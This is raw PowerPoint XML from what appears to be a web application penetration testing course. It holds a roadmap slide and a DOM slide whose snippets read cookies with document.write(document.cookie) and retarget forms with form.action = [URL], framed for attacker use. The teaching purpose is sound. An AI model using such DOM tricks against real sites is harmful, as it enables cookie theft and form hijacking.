                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="33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grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6159"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43600" y="2057400"/>
            <a:ext cx="609600" cy="871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60"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05600" y="5029200"/>
            <a:ext cx="609600" cy="871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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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Client-Side Discovery</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Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156677" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>    Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579120" y="76200"/>
            <a:ext cx="8001000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="152400" y="1143000"/>
            <a:ext cx="8991600" cy="4191000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The DOM provides a standard interface to the document allowing scripts to dynamically access and update content, structure, or style of the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The document referenced is either the HTML or XML page currently being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The DOM also provide native objects to access various items of interest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Document object refers to the whole document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.forms[0] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>refers to the first form on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.write("Hello World!") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>writes the string Hello World! to the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.write(document.cookie) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>will write the value of the page's cookies to the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Form object is used to access a specific form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>form.action = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>[URL]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sets the form's action to the URL allowing for redirecting the browser to another page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>form.submit() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>will submit the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will explore many others in the exercise challenges ahead</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DOM Nodes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="158723" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1097280" y="3017520"/>
            <a:ext cx="6934200" cy="3124200"/>
            <a:chOff x="457200" y="3352800"/>
            <a:chExt cx="6934200" cy="3124200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158725" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="457200" y="3352800"/>
              <a:ext cx="6934200" cy="3124200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Document</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158726" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="4191000" y="3733800"/>
              <a:ext cx="914400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
